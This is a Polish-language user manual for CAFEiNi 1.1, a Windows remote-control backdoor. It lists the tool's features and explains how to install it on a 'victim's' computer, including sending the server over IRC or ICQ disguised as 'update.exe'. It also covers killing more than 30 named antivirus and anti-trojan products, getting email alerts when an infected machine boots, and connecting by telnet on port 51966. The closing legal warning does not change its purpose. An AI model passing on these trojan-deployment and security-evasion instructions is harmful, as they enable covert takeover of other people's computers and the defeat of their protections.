CAFEiNi 1.1 (nie bój się, CAFEiNi nie gryzie (na razie :))
NOWA GENERACJA BACKDOORÓW NA WIN95/98/2000/NT/ME (DO ZDALNEJ KONTROLI KOMPUTERA)

1. Dlaczego CAFEiNi jest lepszy od innych backdoorów (w rodzaju NetBusa):
-potrafi usunąć z pamięci ponad 30 antywirusów i antybackdoorów pod Windowsa
-serwer automatycznie aktualizuje się przez protokół http
-nie instaluje się w rejestrze (kiedy może lub instaluje się pod losową nazwą)
-jest napisany w Visual C++ (mniejszy i szybszy niż inne backdoory w Delphi)
-możesz sterować zdalnym komputerem przez telnet (np. z Unixa)
-działa na Windowsie 95/98/ME a także na Windowsie NT/2000
-programem CAFEiNi klient można kontrolować kilka komputerów jednocześnie
(np. wysunąć klapkę CD-ROMu na 10 komputerach jednym kliknięciem myszki)
-pełny multitasking (np. możesz sciągać i wysyłać pliki na wiele komputerów
w jednym czasie)
-posiada dużo nowych komend (szczególne związane z ekranem)
-klient jest bardzo łatwy w użyciu jak stary, dobry Netbus 1.x
-zawiera konfigurator do serwera

2. Co to jest CAFEiNi.
CAFEiNi składa się z trzech programów dla Windowsa 95/98/ME/2000/NT:
a) "CAFEiNiserver.exe" - daje klientowi możliwość zdalnego kontrolowania komputera
(hosta) na którym jest zainstalowany serwer. Serwer daje klientowi kontrolę, czasami
większą niż ma użytkownik siedzący przy tym komputerze.
b) "CAFEiNiclient.exe" - służy do kontrolowania zdalnego komputera (serwera).
Zamiast CAFEiNi klienta można używać dowolnego klienta telnetu aby kontrolować
komputer pracujący pod Windowsem przez komputer pracujący pod Unixem, Linuxem...
Ale CAFEiNi klient potrafi dużo więcej np. ma skaner portów i możliwość kontrolowania
kilku komputerów jednocześnie (np. wysunięcie klapki CD-ROMu na wszystkich
komputerach (serewerach) jednym kliknięciem myszy).
c) "CAFEiNiconfig.exe" - służy do konfigurowania CAFEiNi serwera przed zainstalowaniem lub
wysłaniem do "ofiary" np. Można wybrać port lub włączyć powiadomianie e-mailem o
uruchomieniu serwera. Wtedy za każdym razem, gdy komputer z zainstalowanym serwerem
jest włączany powinien zostać wysłany e-mail.

3. Jak spróbować bez instalowania serwera.
Możesz uruchomić serwer z opcją "/noinstall" np. "CAFEiNiserver.exe /noinstall"
i serwer nie zainstaluje się w systemie. Przy następnych uruchomieniu
komputera CAFEiNi serwer nie będzie zainstalowany. Można także uruchomić
serwer i klienta na tym samym komputerze (wpisz adres "127.0.0.1" w kliencie),
ale niektóre komendy mogą nie działać wcale albo źle działać.

4. Jak zainstalować serwer.
To bardzo proste, musisz uruchomić "CAFEiNiserver.exe" na komputerze "ofiary".
Jeżeli nie masz fizycznego dostępu do komputera "ofiary" wyślij serwer "ofiarze"
przez FTP, IRC, ICQ... Możesz zmienić nazwę pliku "CAFEiNiserver.exe" na dowolną np.
"update.exe". Kiedy "ofiara" uruchomi ten program będziesz miał zdalny dostęp do
tego komputera. Programy "CAFEiNiclient.exe" i "CAFEiNiconfig.exe" są tylko do Twojego
użytku. Możesz użyć CAFEiNi konfiguratora do ustalenia parametrów startowych serwera
przed jego zainstalowaniem lub wysłaniem.

5. Jak się połączyć (uzyskać zdalną kontrolę).
a) z CAFEiNi klienta ("CAFEiNiclient.exe" działa na Windowsie 95/98/ME/2000/NT)
wpisz nazwę hosta lub IP ofiary, standartowym portem jest 51966 (0xCAFE),
kliknij "Połącz" i jeżeli serwer jest zainstalowany na tym komputerze a komputer
podłączony do Internetu (lub jakiejś sieci) zostaniesz uzyskasz połączenie
b) z klienta telnetu (działa z dowolnego komputera, który ma telnet)
wpisz komendę "telnet 51966", gdzie jest nazwą hosta lub numerem
IP ofiary (np. z Windowsa kliknij "Start", później "Uruchom" i wpisz coś w rodzaju:
"telnet 107.3.45.11 51966")

6. Jak usunąć serwer.
Połącz się telnetowym klientem z serwerem (zobacz punkt 5). Ewentualnie wpisz hasło,
jeżeli jest ustawione. Później wystarczy wpisać komendę "UNINSTALL" i nacisnąć Enter.
Program powinien zostać całkowicie usunięty z systemu. Można to sprawdzić restartując
komputer, po czym serwer nie powinien już odpowiadać (brak możliwości uzyskania dostępu).
UWAGA! Może się zdarzyć, że w systemie jest więcej niż jeden zainstalowany CAFEiNi serwer.
Wtedy musisz odinstalować serwer kilka razy (jedna komenda UNINSTALL usuwa jeden serwer)

7. Zabijanie antywirusów i antybackdoorów.
CAFEiNi serwer potrafi zabić (usunąć z pamięci) wiele antywirusów i antybackdoorów.
Ale musi zostać uruchomiony przed każdym monitorem antywirusowym, który wykrywa tą
wersję serwera, ponieważ w innym wypadku CAFEiNi serwer się wogóle nie uruchomi.

CAFEiNi serwer potrafi usunąć z pamięci następujące antywirusy:
AntiViral Toolkit Pro
AntiVirus eXpert
Anywhere AntiVirus
Avast32
AVK SCAN
eSafe Protect
F-Secure AntiVirus
F/WIN32
FIBER Anti Virus
Integrity Master
Intel LANDesk Virus Protect
McAfee VirusScan
MkS_Vir
Norton AntiVirus
Panda AntiVirus
PC-cillin
Quick Heal
Romanian AntiVirus Pro
Sophos Anti-Virus Sweep
ThunderBYTE AntiVirus
VirusSafe Web

CAFEiNi serwer potrafi usunąć z pamięci następujące antybackdoory:
AntiTrojan
BackWork
HookProtect
LockDown
Protector2K
Tauscan
The Cleaner
TrojanDefenseSuite
Trojan B' Gone

8. Jeżeli chcesz pomóc (raportowanie o błędach).
Jeżeli wykryłeś jakieś błędy proszę wysłać raport do autorów na niżej
podany adres e-mail. Gdy błędy te dotyczą serwera proszę o załączenie
pliku stworzonego w następujący sposób:
Proszę uruchomić serwer z opcją "/debug=\"
(np. "CAFEiNiserver.exe /debug=c:\cafeini.log") i robić to samo co
poprzednio gdy wykryłeś błąd aż pojawi się ten sam problem.

9. Wymagania programu CAFEiNi.
-komputer z zainstalowanym Windowsem 95/98/ME/2000/NT
-zainstalowane TCP/IP

10. Licencja.
Przez używanie programu CAFEiNi użytkownik zgadza się na:
a) CAFEiNi jest rozpowszechniany za darmo
b) CAFEiNi jest dostarczany 'jaki jest', bez żadnej gwarancji
c) autorzy nie są odpowiedzialni za szkody spowodowane użyciem tego programu
d) nie można używać tego programu do celów sprzecznych z polskim prawem
e) program CAFEiNi musi być rozpowszechniany wraz z tą licencją

Przestrzegam, że bezprawne uzyskanie informacji, naruszenie integralności
komputerowego zapisu danych, podsłuch i sabotaż komputerowy, a prościej
uszkodzenie, usunięcie zmianę danych, także zapoznanie się z treścią
bezprawnie uzyskanych informacji jest karalne art.267 ż 1 k.k. art.267 ż 2
art.268 ż k.k. art.269 k.k.


11. Kontakt z autorami:
E-mail: cafeini@viper.pl
cafeini@kki.net.pl
WWW: http://viper.pl/~cafeini
http://kki.net.pl/~cafeini